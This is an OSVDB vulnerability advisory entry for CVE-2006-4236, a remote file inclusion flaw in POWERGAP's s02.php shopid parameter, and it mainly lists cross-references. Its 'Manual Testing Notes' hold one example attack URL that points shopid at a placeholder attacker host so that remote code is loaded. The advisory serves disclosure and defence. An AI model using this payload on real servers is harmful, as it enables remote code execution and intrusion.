POWERGAP s02.php shopid Variable Remote File Inclusion

2006-08-17T02:59:05
ID OSVDB:29497
Type osvdb
Reporter OSVDB
Modified 2006-08-17T02:59:05

Description

Manual Testing Notes

http://[target]/s02.php?shopid=http://[attacker]?

References:

Security Tracker: 1016715 Related OSVDB ID: 29496 Related OSVDB ID: 29499 Related OSVDB ID: 29500 Related OSVDB ID: 29498 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0350.html ISS X-Force ID: 28425 Generic Exploit URL: http://www.milw0rm.com/exploits/2201 CVE-2006-4236 Bugtraq ID: 19565